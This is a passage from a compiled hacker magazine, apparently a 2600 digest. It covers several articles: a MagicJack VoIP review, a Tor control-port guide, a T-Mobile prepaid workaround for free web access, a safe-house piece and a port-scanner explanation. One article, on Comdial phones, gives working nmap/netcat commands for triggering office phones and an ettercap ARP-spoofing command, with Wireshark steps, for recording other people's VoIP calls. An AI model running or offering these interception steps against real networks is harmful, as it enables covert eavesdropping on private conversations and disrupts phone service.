on all circuits busy recordings). The trunk used is 062T, which is the New York 24 tandem. • Call waiting works correctly. There is no threeway calling available on outbound calls. A three-way calling feature for inbound calls is available, but I couldn’t get it to work. • Voice mail is available, and is surprisingly rich and full featured. The terms of YMAX’s interconnection agreements require a reasonable degree of traffic parity for the “bill and keep” arrangements made, so YMAX definitely wants you to receive calls. • Call forwarding is available via the MagicJack website. You can log in to set up forwarding. • *67 doesn’t work, and there’s no apparent way to block Caller ID (either per-call or permanently). Unless MagicJack is a giant Ponzi scheme, how could they possibly afford to provide unlimited calling for only $20 per year? This is something I really wanted to find out, given the spectacular collapse of previous VoIP services priced well below market. What I discovered is that $20 per year may become the new market price for voice service. MagicJack is a subsidiary of YMAX Communications Inc., a fully qualified CLEC with a management team consisting of numerous telecommunications industry veterans. These folks knew what they were doing, and played their cards very shrewdly when setting up the company. In reviewing the interconnection agreements filed between YMAX and AT&T for its 13-state region (handled by tminc. com), the billing arrangement is consistently “bill and keep” and is not subject to access charges (a topic I’ve written extensively about in previous columns). There is one exception, which is ISP-bound traffic. This is subject to a .0007 cent charge per minute of use, where activity exceeds a 3:1 terminating to originating ratio. This is clearly why MagicJack provides such fullfeatured voicemail; they need to maintain at least this balance of inbound to outbound calls in order for their business model to work. In fact, it is possible (though unlikely) under this arrangement for YMAX to receive reciprocal compensation from AT&T for inbound calls to MagicJack lines while terminating calls for free to AT&T’s network. In many states, it’s difficult to obtain access to tariffs without paying. However, I was able to review a Qwest tariff for Montana and a Verizon tariff for Illinois containing similar terms, so it’s reasonable to believe that YMAX has pursued a consistent strategy with respect to interconnection. While the underlying carrier (YMAX) is a CLEC, MagicJack is specifically not offered as a CLEC product. The terms of service explicitly state that MagicJack is “...a multimedia experience which includes a voice over Internet information service feature. It is not a telecommunications service and is subject to different regulatory treatment from telecommunications services.” This appears to exempt MagicJack from essentially any regulation from either the FCC or local public utility commissions. It’s time to bring this column to a close. Have a safe winter… and if you make it to China, enjoy the Harbin ice sculptures, try some delicious Uighur cuisine, and don’t miss the pandas! Shout outs to: Chronomex, afiler, javantea, maokh, inf0reaper, Dan Kaminsky, and the Metrix Create:Space crew.

171

THE HACKER DIGEST - VOLUME 26

by iphelix
This guide will show you how to enhance (or completely break) your privacy on the intertubes by delving into Tor’s internals. You will learn how to create custom circuits of any size, monitor every aspect of Tor activity, and other really cool hacks. The key to all of this is Tor’s embedded control protocol which gives you a lot more control over Tor’s operations compared to the standard “push-the-big-red-button” GUI interfaces. First things first, you must enable the Tor control port by editing /etc/tor/torrc. Uncomment ControlPort line:
## The port on which Tor will listen ➥ for local connections from Tor ## controller applications, as ➥ documented in control-spec.txt. ControlPort 9051

0. Introduction

most part these variables can be set inside torrc; there are several variables (e.g. __DisablePredictedCircuits) which can only be set through the Tor control interface.
setconf controlport=9051 250 OK

saveconf - saves current configuration values to the torrc file. Values such as __DisablePredictedCircuits will not be saved. For a complete listing of configuration variables that you can view or set issue the following command:
getinfo config/names

HINT: You can quickly enable control port by passing --controlport 9051 when executing Tor from the command line. With the control port open, we can now connect to the Tor server:
$ telnet localhost 9051

1.1.2 Viewing what Tor is doing Tor has a highly customizable logging system which allows us to see exactly what it is doing in the background. Before any information will be displayed, we must tell Tor exactly what we want to see using the “setevents” command. “setevents” enables console log output of predefined event types. Valid event types include: • CIRC - circuit events. Includes information on newly created, already existing, and closed circuits. • STREAM - stream events. Provides information on the status of application streams, including which circuit is used for the connection. • ORCONN - Tor network connection events. These events display newly established and closed connections to Tor nodes. • BW - bandwidth in the last second. If you enable this event, it will produce output every second, even if there is no activity. • STREAM_BW - bandwidth used by individual streams. Unlike BW, STREAM_ BW displays data only when there is activity. • DEBUG, INFO, NOTICE, WARN, ERR informational messages of varying severity. • ADDRMAP - address mapping events. These events show domain-to-ip mappings that are cached by the Tor client. • NEWDESC, AUTHDIR_NEWDESCS, DESCCHANGED - dirserver events. • STATUS_GENERAL, STATUS_CLIENT,

Once connected, we need to authenticate (password hash is “” by default):
authenticate “” 250 OK

Note: Vidalia enables control port with a password, you will need to look up that password or avoid using Vidalia to start Tor. 1.1. Tor control commands We can now control the Tor client’s operation by issuing a number of commands. This is a bit boring, but you will need to learn some of the more important commands before you can start messing with Tor. 1.1.1 Viewing and setting configuration variables You can view and set Tor configuration variables to change Tor’s operation. Most of these variables are set in the torrc file, but you can override them dynamically as you see fit. Play with these commands to learn more about Tor’s configuration. getconf - gets a value stored in a configuration variable.
getconf controlport 250 ControlPort=9051

setconf - sets configuration variables. For the

172

enable appropriate event output using the ‘”setevents” command. we will need to increase the circuit build timeout.croeso.125.THE HACKER DIGEST . we are ready for some fun.sabotage.Tor ➥MiddleMan391. • NS .39. Any other number will extend an already existing circuit with the supplied circuit id. circuits. use the following command:
getinfo events/names
1.aim1loxal1net.chaoscomputerclub23 250 OK
Get information about currently open streams:
getinfo stream-status 250+stream-status= 4 SUCCEEDED 2 74. but it is still awesome to send your packets flying around the world:
setconf circuitbuildtimeout=300 250 OK extendcircuit 0 blutroth.).sabotage 250 OK getinfo circuit-status 250-circuit-status=5 EXTENDED blutr ➥oth. This does not really increase your anonymity. To build a circuit of this size. First.39.$E56FEA ➥BE3E7D822931F768A7A0F18E7BEA901EBD . 0 means create new circuit.status information • GUARD .$E285783006B1B71 ➥93B296A5C858B95FD85566A60.croeso. in order to enable console output of event types circ (circuit events) issue the following command:
setevents circ
Now that you know how to configure Tor. 250 OK
2. For a complete listing of information types that you can view issue the following command:
getinfo info/names
Immediately following “extendcircuit” is the circuit id.Tonga.
extendcircuit 0 blutroth. Let’s go insane with a ten-hop circuit. Get information on currently open circuits:
getinfo circuit-status 250+circuit-status= 4 BUILT Xaishacha.croeso 3 BUILT blutroth.sabotage 2 BUILT blutroth. or extend.TorMiddleMan391. I personally find the following set of events most informative:
setevents extended circ stream ➥ orconn addrmap status_ ➥general status_client guard
(longer period for circuit expiration) Let’s delete already created circuits so that they don’t interfere with us:
closecircuit 2 250 OK closecircuit 1 250 OK getinfo circuit-status 250-circuit-status= 250 OK
For a complete listing of event types that you can enable.cro ➥ eso. So.147:80 3 SUCCEEDED 2 74.$9E9FAD3 ➥187C9911B71849E0E63F35C7CD41FAAA3 1 BUILT blutroth.guard node events.147:80 250 OK
In case you don’t see expected output.Xaishacha ➥. Creating Custom Circuits
Multiple events can be specified at the same time:
setevents circ stream orconn
Prepend keyword “EXTENDED” to see extended event information where available:
setevents extended circ
(disable preemptively creating circuits) setconf MaxOnionsPending=0 (maximum circuits pending)
setconf newcircuitperiod=999999999
(longer period before creating new circuit)
setconf maxcircuitdirtiness=999999999
Note: Every time you issue a setevents command.1.147:80 2 SUCCEEDED 2 74.125.TorMiddleMan391 ➥.TorMiddleMan391.sabotage. We can query this information using the “getinfo” command.3 Querying Tor for runtime information Tor has a large number of runtime variables that it needs to keep track of in order to successfuly build circuits.sabotag ➥e.125.1 Creating five or more-hop circuits How about creating a five-hop circuit for privacy overkill .TorMiddleMan391.Bellum. all displayed event types will be reset.TorMiddleMan391.poolTOR.VOLUME 26
• STATUS_SERVER . you will need to change some configs to disable circuit autocreation and allow us to create and destroy all circuits manually:
setconf __DisablePredictedCircuits=1
2.bettyboop. ➥croeso 250 OK getinfo circuit-status 250-circuit-status=5 BUILT blu ➥troth.optipiii866.chaoscomputerclub23 250 EXTENDED 5 getinfo circuit-status 250-circuit-status=5 EXTENDED bl ➥utroth.sabotage. Use the “extendcircuit” command to create.39.chaoscomputerclub23 250 EXTENDED 18 650 CIRC 18 LAUNCHED
173
.network status events.

So go ahead and have some fun! Here are a few links to get you started: • http://www.176.co.desync 650 CIRC 17 BUILT sabotage.224.org/svn/ trunk/doc/spec/control-spec.cnn.24.224.com 216. Using this script.3:80 SOURCE=CACHE 650 STREAM 11 SENTCONNECT 17 206.SEC 650 CIRC 17 EXTENDED sabotage.co. waiting to be discovered.1:45597 ➥ PURPOSE=USER attachstream 11 17 HOP=3 650 STREAM 11 REMAP 0 206.uk=www. Hint: Use attach a stream to circuit 0 to let the Tor client assign it automatically.ephemer.224.tar.3:80 650 STREAM 11 CLOSED 17 206. Automation
Resolve domains and IP addresses using Tor:
setevents addrmap 250 OK resolve 2600.3:80 250 OK 650 STREAM 11 REMAP 17 206.com 650 ADDRMAP 2600. ➥bbc.2600.2 250-ip-to-country/216.uk.org/code/src/tor-auto ➥circuit.torproject.66.com
176
The Next HOPE
. Conclusion
More than 100 DVDs are now available at the 2600 store store.THE HACKER DIGEST .chaoscomputerclub23.
5.bbc.66.209 (tor. which corresponds to the chaoscomputerclub23 exit node.2 ➥ “2008-10-11 05:07:45” ➥ EXPIRES=”2008-10-11 12:07:45” 250 OK resolve mode=reverse 216.chaoscomputerclub23.176.3:80 SOURCE=EXIT 650 STREAM 11 SUCCEEDED 17 206.169.)
mapaddress www.bz2 Also.66.24. specify circuit sizes.SEC.torproject. how many ocean and continent crossings you want to take.24.VOLUME 26
650 CIRC 17 EXTENDED sabotage 650 CIRC 17 EXTENDED sabotage.2=us 250 OK
3.chaoscomputerclub23 650 CIRC 17 EXTENDED sabotage. for a quick listing of Tor exit nodes to use in your custom circuits.0. Below are a few more random tricks: Get the country code for an IP address:
getinfo ip-to-country/216. You can get it here: http:// ➥thesprawl.py
4.24.desync 650 STREAM 11 NEW 0 whatismyip.exit
I have developed a Python script to automate circuit creation using the TorCtl library.66.137. and leet dudez of sf2600.COM “2008➥10-11 05:09:10” EXPIRES=”2008-10➥11 12:09:10”
There was a lot of ground covered in this guide.org:80 SOURCE_ADDR=127.2 250 OK 650 ADDRMAP REVERSE[216.66.uk
Reduce Tor traffic by disabling preemptive circuit creation:
setconf __DisablePredictedCircuits=1
Speed up Tor:
setconf CircuitBuildTimeout 10
Use specific exit node for a website
mapaddress www.176.0.com=www.de).ccc.org is 81.2600. use another script I wrote to query the exit node directory listing: http://thesprawl.224. and many other tweaks.txt Root teh moon! Greetz to all mrlers. good folks from trin.176.SEC.org/code/src/tor➥nodes.24. you will be able to specify which countries you want to use for each hop.bbc.3:80 REASON=DONE
The IP address returned by whatismyip.co.224.SEC.176.anonymizer.2] ➥ phalse.txt • https://svn. Other tricks
Switch to new circuits:
signal newnym
Let’s redirect all CNN traffic to BBC . but there are even more interesting hacks still out there.org/svn/ torctl/trunk/doc/howto.

I worked around using Google Calendar and the very cool GVENT (48368) SMS on-the-fly event creation function. you get a fairly full page of options. Some other sites that do not appear on the T-Zones menus but are accessible by URL entry include: mobi. Syn Ack (757). There are some even faster work-arounds that can be manipulated by use of the oneSearch function.m. If you enter “wiki” and your search term in the search box.amazon. JaR_ G0ats. not so much.VOLUME 26
Hack T-Mobile Prepaid Messaging and T-Zones
by Mr. And now that I have access to a regular mobile inbox. ➥com/. Even the heavily-castrated (but. though not referenced anywhere in the T-Zones menus. So then you’ll see that if you point the WAP browser to the URL http://us. 4INFO (wap. right? No. “amusing info. However.net. What the phone lacked in PDA function. sports. As you can probably imagine.traffic. T-Mobile’s prepaid per-message charges do not apply here.com/gp/aw).” etc. but they get the job done and don’t cost a penny. Again. by extension I also have access to essentially the full internet. The steps involved are not always time-effective. Bookmark this page. The free “T-Zones” web access provides direct links to only a few sites (news. I can do this by use of web-by-email services such as www@web2mail. will be able to provide me free web access for life. I found myself burning through more nickels and dimes (literally) than my stinginess could handle. there is a search box. which I could couple with home and work PCs without ever having to physically sync.
177
.. and are perhaps best personified by my mobile f0ne: a vanilla..” So T-Mobile keeps their prepaid customers on a pretty strict data diet.).4info. First of all. a mirrored Wikipedia entry for your search term (retrieved from a still-accessible Yahoo domain) can be received. none of these methods or WAP sites are particularly suave. The compromises to which they usually come leave them both wanting. So go ahead and send and receive messages with wild abandon.net). is not part of T-Mobile’s DNS blacklist (probably because many of the handsets include a podunk Yahoo IM client). now we know that Yahoo! Mobile. you can work outside the margins that T-Mobile has established for its prepaid customers. Curious / DoPi
I am an unrepentant cheapskate and also an information junkie. between the sending and receiving of several SMS reminders (as well as the occassional Twitter or regular SMS messages). these two aspects of my personality are constantly at war with one another–the latter always wanting more and fresher data. which will pull the current page and send it to your Yahoo! Mobile inbox. radar. but they do provide some options to soup-up your prepaid plan at no cost. there have been a few times that I’ve needed fairly “normal” web access–to win a bet. HoFo.yahoo. the former usually unwilling to foot the bill. By utilizing the steps below. Shout-outs: Bobakko & Benji. all importantly. Furthermore.triese ➥.it (enter target URL in body). At this point I went ahead and stopped my SMS Twitter alerts and pointed them instead to my Yahoo! inbox–ditto with SMS event reminders from my Google Calendar account (which I retained because it is superior in all respects to Yahoo!’s). I’ll always retain my trusty T-Mobile prepaid (with a couple bucks balance to keep it alive). you can see that one of the options there is Yahoo! Mail–and bear in mind that we are still in the FREE area of T-Zones.com (enter target URL in subject) or www4mail@wm. FREE) “T-Zones” function has worked fairly well and provided data snippets like stock quotes and weather forecasts when I’ve needed them. So. which. and even Amazon (www.ictp. you may notice that at the top of the T-Zones page. it has functioned adequately for what I need: a short voice call or two per day and the occasional SMS. look up a definition.THE HACKER DIGEST . Typing anything in there and clicking “Search” takes you to a Yahoo! Mobile oneSearch results page. in a pinch. and any attempts to enter URLs pointing anywhere outside of this handful of pages would return the always-nasty message: “your plan does not support this feature. Now. For the most part. Even if I ever put my tightwad days behind me and (gasp!) get on a contract plan. no-frills “gimme” handheld with T-Mobile prepaid. or what-haveyou. DoPi.com.

It’s very Christmaslight like.. here is a quick review and some commands I did not go over last time. and press the “L” key (it is case sensitive) and “ENTER” like so:
/home/user> nc 192.009] ServiceSubscriptions: Started [12:29:23.22. Other than the different logos they seem to be the same phones.168.22.168..800] Boot Build Date : 05/03/2005 22:40:17 [12:29:21. we need to get a list of all the phones. so I am confident that these techniques will work on these new phones as well. the model is now “Edge 300” instead of “CONVERSip EP300”.230 appears to be ➥ up .22.230: PORT STATE SERVICE 9027/tcp open unknown Host 192.22. Interesting ports on 192.168. and save the output to a file like this:
/home/user> nmap 192.789] Phone Version : 3..22.789] Phone MD5Sum : 3777ad4b3ac20ae9b56391267e81bb90 [12:29:21. Now. good..
Last time I went over logging into the phone remotely using Netcat on port 9027. We can do this with a few simple commands.04 [12:29:21. Interesting ports on 192.22. then press an LED [12:29:24.. as I showed you last time.193 appears to be ➥ up .789] Phone Build Date: 01/16/2009 12:29:21 [12:29:21.026 [12:29:21. Now let’s say you have a bunch of phones that you want to make flash all at once.* -p ➥ 9027 > comdial.790] Connected to station 237 [12:29:21. and disconnect all in one shot like so:
/home/user> echo L | nc ➥ 192.lst” and the contents of that file will look something like this:
The Comdial phones are the addresses with the “9027/tcp open unknown” lines.168.VOLUME 26
Hello all. If you send the “L” command to the phone on port 9027. But first.193: PORT STATE SERVICE 9027/tcp closed unknown Host 192.229] Use ‘u’ and ‘d’ keys to select a cadence. You can connect to the phone with Netcat. Now owned by Vertical Communications. they still make VoIP phones and I’ve seen the identical models released with a different logo on them. This time I’m going to show you a little more you can do with port 9027 and then I’ll explain how you can use Ettercap to remotely record conversations from most VoIP phones through the local network. you can also pipe the command in. good.218] Test LED enabled: [12:29:24.lst” file. So. connect.009] ServiceSubscriptions: Ended L [12:29:24. I’ve learned some things since my last article on Comdial phones. it will make the LEDs all flash in a cool pattern. now we need to run a command that will find the “9027/tcp open unknown” lines in our “comdial.800] Boot MD5Sum : 5b84e34dcf06235e3763c755a9c57e9c [12:29:23.237 9027 [12:29:21.Calling C om d i a l
Part #2
by Metalx1000
THE HACKER DIGEST .229] Current cadence: R
To get the phone to stop flashing just send the “L” command a second time.168.22.22.168. Interesting ports on 192.790] command_poll: action->fd_ptr=9 accepted [12:29:21. the networking swiss army knife. But first.22. Now.168. Also..231: PORT STATE SERVICE 9027/tcp open unknown
This sends the “L” key to the phone and the “-q1” is a switch telling Netcat to disconnect after 1 second.237 9007 -q1
Host 192. Let’s use Nmap. once again. It will create a text file called “comdial. strip away everything
178
.778] command_poll: got listenfd event [12:29:21. they say “Vertical”. so be patient. instead of saying Comdial at the top of the phone. Comdial was founded in 1977 and went defunct in 2005.lst
This may take a little while.168.0. good.799] Boot Version : 1. Each button on the Comdial phone has an LED light on it.168.231 appears to be ➥ up .

I’m using a Linux machine.1. instead of GUI mode. and the “-Q” tells it to run in quiet mode.lst ➥|grep open -B 2|grep “Inter”|awk ➥‘{print $4}’|cut -d\: -f1|while ➥ read ip.1/ ➥ /192.. If you don’t use the “-Q” switch. You have to be on the same local network as the VoIP phone to capture packets from it. This is because if your computer runs slowly.THE HACKER DIGEST . which can also be fun to do. Both Ettercap and Wireshark are free and open source. I’m not going to go into detail on how packet capturing works.done
So.1.. we “cat” out our list and use “grep” to grab the lines with “open” and the 2 lines before them. just run it again. but this is where the real fun starts..237/ -w comdial. this will bring the network to a halt. and then input those addresses into our Netcat command. but I prefer using Ettercap to capture packets. sometimes it runs a little slow so. if you’re one of those people. but it will run through each IP pretty fast and you will have a bunch of flashing lights all over your office. And to stop them. Let’s use “Ettercap” and “Wireshark” to remotely capture voice conversations from the phone. Then we use “awk” to grab the IP address and “cut” to remove the tailing colon.168.cap” is telling Ettercap to save all packets captured to a file called comdial. I’ve used a combination of “grep”. One reason I prefer Ettercap over Wireshark for capturing is that its command line interface is simple to use and it is easily installed on computers as well as hand-held devices. but that’s just how it is. I know that’s a long line.1. the conversation will break up and the people talking will hang up and redial.168. I’m going to show you how to use Ettercap to capture the traffic and Wireshark to decrypt the conversation. The “-i ath0” is your network interface and may change depending on your computer. which has a 900mhz Celeron Mobile processor and 1GB of RAM. And finally the “-w comdial. So basically.cap. You will need a halfway decent computer and a good connection for this.237/” tells Ettercap to capture all info between the two IP addresses.VOLUME 26
except the IP addresses of the Comdial phones. I have one of these and it works great with Ettercap.168. This will bog down your computer and most likely slow down the whole network as well as bump the people on the phones off. So. and “awk” to do this:
/home/user> cat comdial. “cut”.cap
The “-T” tells Ettercap to run in text mode. you can do this to phones in your office while
179
. That was fun. One such device is the Nokia n800/ n810 Internet tablet. If you were to change that to “// //” it would try to capture all network traffic for the entire network.echo “$ip.1/ /192. it is capturing all the traffic for that phone. You could use Wireshark to
do both. I would suggest something a little faster. Unless you have a very fast computer.168.1. Here is the command you will type for capturing the packets:
/home/user>ettercap -T -Q -M ➥ arp:remote -i ath0 /192. to use this technique reliably. I’m using my Eeepc 900 by Asus.check”.check”’ is just a visual output for the user to know how far along in the process they are. We then pipe “L” into Netcat for each IP address that we grabbed. The ‘echo “$ip. and can fit easily into your pocket.do echo L|nc $ip 9027 ➥ -q1. The “/192. but I believe that they both run on Windows as well.. One of the IP addresses is the phone and the other is the router it’s connected to. Sometimes it works great. it will try to display all the packets captured on the screen.

THE HACKER DIGEST - VOLUME 26
you are at the office. You won’t be able to do it from home or another office location, since you have to be on the same local network, but you will be able to capture any incoming calls to the targeted phone. Once you are done capturing the info you want, press “q” to quit Ettercap. You can also use the good old “Ctrl+C” to quit Ettercap, but this will give you a message that says “User requested a CTRL+C... (deprecated, next time use proper shutdown)”. I have used “Ctrl+C” to quit before, and it didn’t cause any problems, but I would just suggest using “q” since that is the proper way to do it and you never know what might go wrong if you don’t. Now we can open Wireshark to decode and listen to any conversations that may have taken place on the phone while we were capturing. You can either run “wireshark ➥ comdial.cap” at the command line, or open Wireshark and do the regular “File>Open” from the menu. Now that you have the files open, you will see a list of all packets captured. There will be a lot there and you may want to look through it to see if you can find anything interesting. But for now, we’re just going to be listening to voice conversations. Click “Statistics” from the menu bar and go down to “VoIP Calls”. Wireshark will scan through all the packets and find any VoIP calls for you. Select one from the list and then press “Player”. A new window will open. There is a box that says “Jitter Buffer” and it defaults to 50 milliseconds. I’ve changed this number and it didn’t seem to change the audio output at all. So, just press the “Decode” button and, though it may take a few seconds, it will display two audio tracks. At first you might think that these are Left and Right audio channels, but they are not; they are caller and receiver channels. That’s right, both parts of the conversation are recorded to separate files. To play the tracks, check the check box under the audio track or tracks you want to listen to. Then press “Play”. You should hear the conversation you recorded. The recording may play back a little slow, but that is normal. Well, this has been part #2 of my Comdial articles. I hope you liked it because I plan on writing another on how to call a Comdial (or any SIP phone) from your computer or handheld device. Thanks to Canola & Gun_Smoke for your help and support.

Underground Physical Network
by MasterChen infoinject@gmail.com
So, you find yourself on the other side of town from your home base and you just wish you had a safe house where you can freshen up before heading to your next big event. Or, what if a psycho ex-girlfriend or stalker knows every place you frequent? Wouldn’t a few hiding places work to your advantage?This is exactly what we will be discussing today! Whether escaping from real life for a few seconds, hours, or days at a time, I’m going to illustrate how you can build a relatively underground network of safe houses, physical caches, hideouts, or just secret meeting areas. Now, of course, before we continue, I am not telling anyone to use these techniques to run from the authorities. That’s your own mess and business. Imagine your home or place of residence as a command center or home base. All other locations are going to be referred to as satellites. The first thing to be done is to find several locations with the following criteria: 1. Trustworthy: You know the host very well and they would cover for you if needed. Hosts being the owner or manager of each particular location, i.e. friend’s house, office, etc. 2. Accessible: Availability of your satellites needs to be no less than 95%. You never know when you are going to need such a facility, especially since most of the time it would be used for emergency or unplanned circumstances.

Satellite Setup

180

THE HACKER DIGEST - VOLUME 26
3. Proximity: Near and far from your normal routine. As an example, I have spots all over the city; a few of which are on The Strip. 4. Quick or camp?: Can the place just be used to drop off excess baggage, or can it be used to camp at for a few days? Keep these guidelines in mind and you will be well on your way to establishing your underground network. Now that we have locations set up and available to us, it’s time to make these areas into fully functional facilities. With proper resources, you can stay off the grid for a while and remain comfortable. First, we need to establish the necessities, such as food and restrooms. If your location does not have food in it, make sure it’s relatively close to a place with some sort of food supply. Restrooms are a must, unless you have an iron bladder. Next, a change of clothes would be ideal for comfort, or for a new look when leaving the facility. You can come as a business person and leave as a casual civilian or vice versa. Please refer to the Autumn 2008 edition of The Quarterly for my article on six points of disguise, if you need ideas on wardrobe. Your material can be as simple as a backpack of clothes stashed nicely in the facility somewhere to a full blown walk-in closet. After the bare necessities are are covered, we can add other features for additional functionality. If it is possible and realistic, Internet access would be great to have at your sites for several reasons that we are all aware of. Make sure your connection is proxied. :-) A few books or a small entertainment system may be in order if you are planning on staying a while. Just keep in mind that portability should be a priority when staying out of sight. There may come a time when someone discovers your clandestine station. What should you do? Is there anything you can do? How exactly do you recover? It is inadvisable to revisit a compromised satellite. Someone crazy could be waiting there for you. This is why all resources, at any location, should be easy to replace and inexpensive. If you must visit a site after someone dangerous knows about it, get there quickly. Take what you need. Destroy what you don’t. You won’t be able to visit that particular facility for quite some time, if ever again.

Preventing Satellite Compromise
Of course, there are measures you can take to minimize the probability of your underground network being discovered and these steps are very simple. Make sure no one important is watching you as you access these sites. This destroys the entire purpose of being covert. Follow the “need to know basis” policy. No one really needs to know where you are to contact you. Cellphones are a wonderful thing. The hosts of your locations only need to know their specific role in your network. Only your closest loved ones should know exactly where you are. I’m referring to those who would report you missing and put your picture on the 6 o’ clock news if you went off the grid without them knowing. Only use your satellites when you need to. Frequent visits can develop a pattern that others can use later for surveillance. Physical caches may be used instead of satellites for quick drop off and pick up of sensitive material.

At the Satellite

While Off the Grid
Invisibility is important in times like these, so here are a few things to help you. While out and about, invest in a prepaid cellphone that doesn’t require your actual information for service. Always pay in cash, because it does not leave a paper trail. If you have a GPS enabled phone, disable GPS. PO boxes are something you might want to utilize so that no one can pinpoint any place of residence on you.

Conclusion
Remember that in today’s age, you are responsible for your own privacy and security. This ideology transcends technology and should really be viewed as a lifestyle. Too much paranoia can make you crazy, but no paranoia can leave you completely exposed to anyone. What’s wrong with having a place to escape the real world?

What if the Satellites are Compromised?

Shoutouts
bgm: Your ability to learn how to break new systems relatively quickly astounds me. sneaksy: You’re the best game hacker I know, hands down. heck48: It takes a hacker to understand one sometimes. Thanks for not restricting my exploration when I was younger. JC: What can I say that I haven’t already? You inspire me.

181

THE HACKER DIGEST - VOLUME 26

Understanding Hacking Tools with Socket Programming

by Uriah C.
There are many tools out there for scanning and breaking into remote systems. With tools like Nmap, Metasploit, and ettercap, scanning and exploiting is easier then it used to be. This, combined with many online tutorials, can give anyone the ability to wreak havoc on a system. It can be as easy as doing a scan with Nmap and then using an exploit and payload from Metasploit. Not to mention that the many live GNU/Linux disks containing these tools are just a download away. Don’t get me wrong, I use these tools for testing the security of my network and love the fact that I can do it quickly. But I am more inquisitive than most when it comes to my tools. I want to understand how they work.

The first step in exploiting a remote system is knowing which ports are running a service that can be exploited, so I decided to write a simple port scanner in order to come to an understanding of programming client applications that can be used to find open services. The easiest way to find an open port is to try to connect to that port. If one can connect to the port, then there must be some service running on it. This is not the stealthiest way to scan a system for open ports, though, because the program is connecting to the service and might leave a log that a client tried to connect. Also, if the service is busy and cannot handle the connection, then the scanner will give a false negative. Here is some pseudocode for my application, which was written in Java:

// If socket programming is not built in, then don’t forget to import the // needed libraries. We need to identify the target. This can be any ip, // but I will use the local address for this example ipAddress = “127.0.0.1”; // Now let’s try to connect to ports on the ip address with a for loop for (port = 1; port < 1025; port++){ try { socket = new Socket(ipAddress, port); Write “port “ + port “ on “ + ipAddress + “ is open”; } // If there is a connection, then it will let us know the port is ➥ open catch(exception) { Write “port “ + port + “ on “ +ipAddress + “ is closed”; } // If the connect fails, then the port is closed. }

The code within the for statement is a basic socket connection, and can be used in any client programming project. For example, one could use the code to connect to a web server and then stream in a URL request. Socket programming is a key element to

remote access. An understanding of it can lead to writing servers and clients for one’s own needs. It facilitates in the writing of clients and servers like mail, HTTP, backdoors, Trojans, and anything else that requires a connection between two computers.

182

Hacker Perspective
Annalee Newitz
Crime and Freedom
A few months after I turned fifteen, my friend Dave told me his summer school driver’s ed class was going to show Red Asphalt, this legendary movie where supposedly you could see people ground into paste after really bad car crashes. “You should sneak in with me and check it out!” he suggested. I was pretty enthusiastic about blood and guts, so this seemed like a sensible idea. Unfortunately, the movie did not deliver: There were no beheadings at all. So I spent my afternoon in the back of an air-conditioned classroom watching the cops on the disappointingly bloodless screen talk about bad, lawbreaking teenagers - and listening to Dave’s friends talk about their computers. It was the mid-1980s, and they were obsessed with cracking Apple software and getting access to The Pig Sty, the most elite BBS in our area. I’d played around with my own computer, a Kaypro 2 running CP/M, but hadn’t realized there was a whole community of kids doing the same thing. I had found my people. I spent the rest of the summer hanging out with those guys, and when school started again we met on a multi-user chat BBS called WizNet. As I learned more about computers, I realized that the people who loved them weren’t just united by a desire to understand networks and assembly. We wanted to find out how complicated things worked - especially things designed to thwart our exploration with obfuscation or outright bullshit. And for many of us, that exploration started with machines and radiated outward to touch everything in our lives. My formative years were spent in the churchy suburbs of Orange County, California, during the Reagan Era. Until I started hanging out with computer hackers, adulthood had been explained to me mostly by fashion magazines and my peers. Apparently it would involve manicures, dying my hair blonde, wearing dresses, and waiting by the phone for boys to “ask me out.” In short, conformity to a repugnant ideal. And yet, I found no alternative models for my future except in science fiction - which was, of course, an impractical template for adulthood unless I expected shortly to mutate or go into space. It was among computer hackers that I began learning about a rogue form of adulthood that defied my community’s expectations, and that was also possible in the real world. Well, it was possible if you didn’t get caught. A year before I joined the computer scene, a bunch of guys my friends knew had gotten arrested for breaking into computers - I can’t remember now whether they’d popped some school computers, government computers, or both. Mostly what I recall is a vivid story my friend Jeff told about seeing the guys’ computers being carted off by federal agents while their parents stood by in open-mouthed rage. This had the effect of wedding forever in my mind the struggle to explore freely and the danger of being branded a criminal. My friends considered it a great accomplishment to crack the copy protection on programs so you could share them with everybody; and we spent many lazy Sunday afternoons wardialing and phreaking our way into free long-distance calls. If this was crime, I decided, then the law was obviously bullshit. And if computer crime laws were bullshit, who knew what other rules were bullshit? Once I’d asked that question, I stopped wearing pink, took on an alias, and made sure my mom never had to buy another copy of Mac Paint again. I also stopped giving a crap about all those unwritten rules on how girls are supposed to act. I wore men’s ties and read pornography. I had a bunch of fantastically nerdy boyfriends, and

THE HACKER DIGEST - VOLUME 26

183

THE HACKER DIGEST - VOLUME 26
I didn’t care who knew about it. The girls in school called me a slut, which I classified as yet another one of those so-called crimes that was actually no crime at all. I started writing stories about heroic outlaw hackers and reading books about counterculture and sex. It was around this time that I decided my goal in life was to escape Orange County and live in San Francisco. Up there, people were fucking anybody they wanted, all the time. Plus, they were making bizarre, amazing art and committing crimes way too awesome for a high school student to find out about. At least, that’s what I assumed, based on the books I’d read. At last, I had a concrete notion of what I wanted to do as an adult. These formative experiences left me with a definition of hacking that might seem surprisingly broad to people who think hackers are highly-technical people who tinker solely with computers and possibly a few other machines. I think of hacking as any rational and concerted effort to explore a complex system and then customize it as you wish. Only that definition explains why my familiarity with BBS systems inspired me to re-imagine, among other things, my gender identity and ethical life. A lot of people struggle their whole lives to live up to the ideal of what it means to be male or female, and live in misery because they can’t. Men are told they have to be strong and aggressive; women, that they should be attractive and emotional. There are hundreds of other such stereotypes, up to and including the one that says men are good at science and women aren’t. And all of them are bullshit. They’re like the glue that game companies used to pour over the chipsets in video games to prevent people from reverse-engineering them. All they do is cover over a basic and discoverable truth, which is that gender is just a set of commands that your body can execute in all kinds of ways that have nothing to do with what the instruction manual tells you. I became a gender hacker because I couldn’t act like a “girl” even when I wanted to. I could have become a man, but I didn’t want that either. Instead I committed myself to tinkering with my identity to reflect who I am and how I want to be seen, which is as a person who doesn’t fit into any known gender category. Partly, this has meant customizing my body. I have short hair and usually wear men’s clothes, though I love wearing vintage dresses and skirts sometimes. I also used surgery to correct the one thing I hated about living in a female body: the possibility of getting pregnant. I got a tubal ligation when I was in my twenties, and ever since then my reproductive system has behaved exactly the way I want it to. Once you start hacking your gender, a lot of other fundamental rules become fungible too. For example, most people think that family means getting married and having babies. Since I had successfully eliminated the whole baby-making problem, I wondered if there were other things about family life that I could reconfigure too. I dated people of different genders, dated several people at the same time, engaged in serial monogamy, went to a lot of great orgies, and was even celibate for a couple of years. I knew I didn’t want an off-the-shelf relationship, and eventually I figured out a configuration that works well for me. And yes, it’s the sort of setup that many people would consider a crime against nature and various gods. Hackers learn at an early age to question what their communities define as “right” and “wrong.” It’s not that 